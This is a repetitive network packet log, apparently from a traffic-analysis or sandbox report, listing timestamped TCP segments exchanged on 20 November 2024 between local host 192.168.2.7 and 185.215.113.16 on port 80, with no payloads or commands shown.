                                                                                                                                                                                                Nov 20, 2024 10:54:34.653109074 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.653114080 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.653126001 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.653140068 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.653142929 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.653160095 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.653182983 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.653207064 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.655397892 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.655415058 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.655430079 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.655445099 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.655462027 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.655462980 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.655478001 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.655488968 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.655494928 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.655529022 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656265020 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656279087 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656302929 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656313896 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656318903 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656335115 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656347990 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656361103 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656377077 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656380892 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656402111 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656431913 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656645060 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656658888 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656672955 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656688929 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656699896 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656713963 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656728983 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656729937 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656747103 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656763077 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656779051 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656801939 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656816959 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656832933 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656847000 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656867027 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656869888 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656888962 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656896114 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656912088 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656925917 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656941891 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656965017 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656980038 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656985998 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.656996012 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.657011986 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.657027006 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.657052994 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.657053947 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.657069921 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.657080889 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.657085896 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.657111883 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658262968 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658287048 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658309937 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658313036 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658324957 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658339977 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658354998 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658363104 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658373117 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658387899 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658413887 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658444881 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658461094 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658476114 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658499002 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658529997 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658607006 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658621073 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658644915 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658660889 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658662081 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658687115 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658700943 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658704042 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658720016 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658735037 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658749104 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658756971 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658761978 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658775091 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658790112 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658802032 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.658838034 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.667958021 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.686417103 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.686431885 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.686458111 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.686474085 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.686490059 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.686491013 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.686503887 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.686520100 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.686522007 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.687335968 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.688105106 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.688128948 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.688148975 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.688163996 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.688180923 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.688194990 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.688200951 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.688200951 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.688215017 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.688275099 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.690388918 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.690475941 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.690490007 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.690505981 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.690520048 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.690521002 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.690537930 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.690556049 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.690561056 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.690577984 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.690579891 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.690604925 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.690619946 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.690642118 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.690649033 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.690659046 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.690674067 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.690689087 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.690690041 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.690722942 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.690748930 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.708403111 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.708431959 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.708445072 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.708452940 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.708461046 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.708467960 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.708476067 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.708527088 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.708529949 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.708554029 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.708570004 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.708574057 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.708586931 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.708611965 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.708615065 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.708627939 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.708643913 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.708655119 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.708657026 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.708702087 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.709642887 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.709670067 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.709683895 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.709687948 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.709703922 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.709719896 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.709733963 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.709748030 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.709749937 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.709758043 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.709764004 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.709788084 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.710263968 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.719044924 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.744154930 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.744216919 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.744235992 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.744250059 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.744265079 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.744287014 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.744301081 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.744313002 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.744318008 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.744335890 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.744359016 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.746428013 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.746443987 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.746453047 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.746476889 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.746490955 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.746491909 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.746515989 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.746526957 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.746536016 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.746579885 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.747215986 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.747229099 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.747265100 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.747308969 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.747333050 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.747349977 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.747356892 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.747384071 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.747394085 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.747399092 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.747452974 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.747452974 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.747864008 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.747879028 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.747894049 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.747910023 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.747917891 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.747931957 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.747942924 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.747951984 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.747961044 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.747976065 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.747988939 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.747992039 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.748008013 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.748018980 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.748024940 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.748050928 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.748063087 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.748078108 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.748091936 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.748094082 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.748109102 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.748122931 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.748135090 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.748138905 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.748153925 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.748162985 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.748169899 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.748183966 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.748198986 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.748200893 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.748214960 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.748225927 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.748281002 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749301910 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749325991 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749341965 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749356031 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749368906 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749372005 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749396086 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749396086 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749414921 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749432087 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749439955 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749475002 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749480963 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749490023 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749505997 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749541044 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749546051 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749562025 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749577045 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749592066 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749618053 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749629974 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749644995 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749659061 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749675035 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749684095 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749691010 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749711037 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749716043 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749731064 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749747992 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749754906 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749764919 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749780893 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749783039 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749797106 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.749825954 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.777075052 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.778794050 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.778810024 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.778826952 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.778841972 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.778856039 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.778858900 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.778893948 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.778917074 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.778939962 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.778955936 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.779000998 CET4981280192.168.2.7185.215.113.16
